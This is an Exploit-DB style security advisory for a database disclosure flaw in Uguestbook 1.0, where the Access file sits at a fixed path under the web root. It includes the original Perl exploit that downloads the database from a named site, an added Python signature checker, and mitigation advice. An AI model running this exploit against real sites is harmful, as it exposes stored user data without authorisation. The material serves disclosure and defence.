Vendor: Uguestbook
By: Cyber-Zone (ABDELKHALEK)
CVSS: 7.5 (HIGH)
Type: Arbitrary Database Disclosure
CWE: 200
Product Name: Uguestbook
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Uguestbook 1.0 Arbitrary Database Disclosure Exploit

Uguestbook 1.0 ships its Microsoft Access database at a fixed, predictable path beneath the web root (mdb-database/guestbook.mdb), and nothing stops the web server from serving that file to any client that asks for it. No authentication, session or user input is involved: an unauthenticated attacker sends a single GET request for http://<host>/mdb-database/guestbook.mdb and receives the raw .mdb file, which contains every guestbook entry and anything else the application stores in that database. The Exploit-DB script below does exactly this and prints whatever the server returns; note that it does not verify that the body is actually an Access file, so a server that answers every unknown path with a 200 OK error page will make it print HTML instead of a database.
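The check a practitioner wants alongside the exploit is whether a 200 OK for that path really carries an Access database rather than a soft 404 page. The script below is an added example, not part of the original advisory or the Exploit-DB script: it builds the same URL the Perl exploit does, fetches the first bytes and classifies them by the Access/Jet file signature (bytes 0-3 are 00 01 00 00, bytes 4-19 hold the format tag "Standard Jet DB" for .mdb or "Standard ACE DB" for .accdb). The two sample bodies are constructed so it also runs offline; the hostname and User-Agent are placeholders.

```python
"""Classify what a web server returns for the guestbook .mdb path.

Added example, not part of the original advisory or exploit. It checks the
Access/Jet file signature so that a 200 OK carrying an HTML "not found" page
is not mistaken for the database. The sample bodies below are constructed.
"""
import sys
import urllib.error
import urllib.request

# Access/Jet header: bytes 0-3 are 00 01 00 00, bytes 4-19 hold the format tag.
FORMAT_TAGS = {
    b"Standard Jet DB\x00": "Jet (mdb)",     # Access 97-2003 .mdb
    b"Standard ACE DB\x00": "ACE (accdb)",   # Access 2007+ .accdb
}

DATABASE_PATH = "mdb-database/guestbook.mdb"  # path the exploit requests

# Constructed samples: a minimal Jet header padded with zeros, and a typical
# HTML "soft 404" page that some servers return with status 200.
SAMPLE_MDB = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 44
SAMPLE_SOFT_404 = b"<!DOCTYPE html>\n<html><body><h1>Page not found</h1></body></html>"


def database_url(site: str, path: str = DATABASE_PATH) -> str:
    """Build the full URL the same way the Perl exploit does (http:// if no scheme)."""
    if not site.startswith(("http://", "https://")):
        site = "http://" + site
    return site.rstrip("/") + "/" + path


def classify(body: bytes) -> str:
    """Return 'Jet (mdb)', 'ACE (accdb)', 'html' or 'unknown' for a response body."""
    if len(body) >= 20 and body[:4] == b"\x00\x01\x00\x00":
        tag = FORMAT_TAGS.get(body[4:20])
        if tag:
            return tag
    head = body[:512].lstrip().lower()
    if head.startswith((b"<!doctype html", b"<html")):
        return "html"
    return "unknown"


def fetch_head(url: str, timeout: float = 10.0) -> tuple:
    """GET the URL and return (status, first 4096 bytes); (status, b'') on HTTP error."""
    req = urllib.request.Request(url, headers={"User-Agent": "mdb-check/1.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096)
    except urllib.error.HTTPError as err:
        return err.code, b""


def main(argv) -> int:
    if len(argv) < 2:
        # Offline demonstration on the constructed samples.
        for name, body in (("constructed mdb", SAMPLE_MDB), ("soft 404", SAMPLE_SOFT_404)):
            print(f"{name}: {classify(body)}")
        return 0
    url = database_url(argv[1])
    status, body = fetch_head(url)
    verdict = classify(body)
    print(f"{url} -> HTTP {status}, body looks like: {verdict}")
    # Only a Jet/ACE signature counts as a confirmed disclosure.
    return 0 if verdict in FORMAT_TAGS.values() else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it without arguments to see the two constructed samples classified; with a hostname (for example `python3 mdb_check.py www.site.com`) it performs the same GET as the Perl exploit and exits 0 only when the signature confirms an Access file, which is the condition you want before reporting the finding.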

Mitigation:

Move guestbook.mdb (and any other data files) outside the web root so the web server cannot serve it at all; if it must stay under the web root, configure the server to refuse requests for the .mdb extension and for the mdb-database directory. Renaming the file or directory is not a fix: the path is only obscured and can still be guessed or leaked. Verify the change by requesting the file directly and confirming the server answers with 403 or 404 rather than the file contents.
Source (Exploit-DB raw data):

#!/usr/bin/perl
#
# Uguestbook 1.0 Arbitrary Database Disclosure Exploit
# Fetches the Access database the application leaves under the web root:
#   mdb-database/guestbook.mdb
#
use strict;
use warnings;
use LWP::Simple qw(get);

print "\tUguestbook 1.0 Arbitrary Database Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";

sub help {
    print "[X] Usage   : perl $0 site \n";
    print "[X] Example : perl $0 www.site.com \n";
}

if (@ARGV < 1) {
    help();
    exit;
}

my ($site) = @ARGV;
print "Please Wait ! Connecting To The Server ......\n\n";
sleep 5;

# The database sits at a fixed path under the web root; no parameter is needed.
my $database = "mdb-database/guestbook.mdb";
my $exploit  = "http://" . $site . "/" . $database;
print "Searching For file ...\n\n";
sleep 3;

# LWP::Simple::get returns undef for any non-success HTTP status.
# The body is a binary .mdb file; redirect stdout to a file to keep it intact.
my $doexploit = get $exploit;
if (defined $doexploit) {
    print "..........................File Contents...........................\n";
    print "$doexploit\n";
    print "..............................EOF.................................\n";
}
else {
    print "[X] $exploit could not be retrieved (file missing or access denied).\n";
    exit 1;
}

# milw0rm.com [2009-05-04]